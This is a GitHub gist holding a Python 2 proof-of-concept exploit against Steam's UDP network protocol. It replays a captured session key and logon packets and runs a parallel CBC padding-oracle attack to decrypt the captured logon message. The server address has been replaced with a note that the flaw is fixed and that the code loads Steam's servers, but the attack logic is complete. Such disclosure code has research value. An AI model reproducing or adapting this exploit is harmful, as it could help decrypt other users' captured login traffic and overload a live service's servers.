Skip to content

Instantly share code, notes, and snippets.

@XMPPwocky
Created April 20, 2016 23:36
Show Gist options
  • Save XMPPwocky/5b3663d231d6578dab8fd752d22c8b5c to your computer and use it in GitHub Desktop.
Save XMPPwocky/5b3663d231d6578dab8fd752d22c8b5c to your computer and use it in GitHub Desktop.
import dpkt, socket, struct, binascii, sys, time, random
if len(sys.argv) < 2:
print "Usage: poc.py pcapfile"
print "PCAP file must contain only the UDP packets of a Steam connection."
sys.exit(1)
capture = dpkt.pcap.Reader(open(sys.argv[1]))
cap_messages_out = []
cap_messages_in = []
firstip = None
for (ts, pkt) in capture:
pkt_eth = dpkt.ethernet.Ethernet(pkt)
pkt_ip = pkt_eth.data
udp = pkt_ip.data
if firstip is None: firstip = pkt_ip.src
if pkt_ip.src == firstip:
cap_messages_out.append(udp.data)
else:
cap_messages_in.append(udp.data)
cap_start = cap_messages_out[0]
cap_sesskey = cap_messages_out[2]
cap_logon = cap_messages_out[3]
cap_other = cap_messages_out[26]
def make_header(data, typebits, dst, src, seq, ack, splitct, splitstart):
return struct.pack("<4sHHIIIIIII",
"VS01",
len(data),
typebits,
src,
dst,
seq,
ack,
splitct,
splitstart,
len(data))+data
def read_header(data):
return struct.unpack("<4sHHIIIIIII", data[0:0x24])
def connect():
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(0.8)
sock.bind(("0.0.0.0", 0))
base_server_list = [("this code puts a lot of load on Steam servers, and it's fixed now, don't run it")]
sock.connect(random.choice(base_server_list))
sock.send(cap_start)
d = sock.recv(1024)
foo = struct.unpack("<I", d[0x24:0x28])[0]
foo = struct.pack("<I", foo ^ 0xA426DF2B) # magic number
sock.send(make_header(foo, 0x203, 1024, 0, 1, 1, 1, 1))
break
except socket.error:
pass
# ignore weird message
d = sock.recv(1024)
dhead = read_header(d)
lastseq = dhead[5]
# ChannelEncryptRequest
d = sock.recv(1024)
dhead = read_header(d)
dst_id = dhead[3]
lastseq = dhead[5]
outseq = 2
# now establish the old session key
sock.send(make_header(cap_sesskey[0x24:],
0x206,
dst_id,
1024,
outseq,
lastseq,
1,
outseq))
outseq += 1
d = sock.recv(1024)
dhead = read_header(d)
lastseq = dhead[5]
sock.settimeout(1.0)
return (dst_id, lastseq, outseq, sock)
def proc(ofs):
imm = []
bytes_from_end = ofs * 16
verifying = False
while len(imm) < 16:
(dst_id, lastseq, outseq, sock) = connect()
i = 0
#print "Session started OK, let's go!"
while i < 256:
m = cap_logon[0x24:]
m = m[len(m) - bytes_from_end - 32:len(m) - bytes_from_end]
if len(m) != 32:
print "too short :|"
prev = "".join([chr(c ^ (len(imm)+1)) for c in imm])
prefix = ""
if len(imm) == 0:
if verifying: prefix = "\x01"
else: prefix = "\x00"
test = prefix + chr(i) + prev
padded = ("\x00"*(16-len(test))) + test
result = cap_other[0x24:] + padded + m[16:]
sock.send(make_header(result,
0x206,
dst_id,
1024,
outseq,
lastseq,
1,
outseq))
outseq += 1
try:
#print "i", i,
d = sock.recv(1024)
dhead = read_header(d)
lastseq = dhead[5]
typebits = dhead[2]
#print "result", typebits
if typebits == 518:
#print "Steam hung up, reconnecting..."
(dst_id, lastseq, outseq, sock) = connect()
#print "OK, let's keep going..."
elif typebits == 517:
(dst_id, lastseq, outseq, sock) = connect()
if len(imm) == 0:
newimm = [i ^ 1]
dec = "".join([chr(ord(a) ^ b) for (a, b) in zip(m[-16-len(newimm):-16], newimm)])
print ofs, binascii.hexlify(dec), verifying
q = ord(dec[0])
if verifying:
verifying = False
if ofs > 0 or q < 16:
imm = newimm
break
else:
i+=1
else:
verifying = True
else:
imm = [i ^ len(imm)+1] + imm
dec = "".join([chr(ord(a) ^ b) for (a, b) in zip(m[-16 - len(imm):-16], imm)])
print ofs, "Possible hit for intermediate state: ", imm
print ofs, "Possible decrypt:", binascii.hexlify(dec)
break
else:
i += 1
except socket.error:
print ofs, "---SOCKET ERROR"
time.sleep(2 + random.randint(1, 3))
(dst_id, lastseq, outseq, sock) = connect()
print ofs, "Done!"
dec = "".join([chr(ord(a) ^ b) for (a, b) in zip(m[-16 - len(imm):-16], imm)])
return dec
blocks = len(cap_logon[0x24:])/16 - 1
print blocks
import multiprocessing
p = multiprocessing.Pool(blocks)
q = p.map_async(proc, range(0, blocks)).get(99999999)
q.reverse()
print "-------------"
for k in q:
print binascii.hexlify(k)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment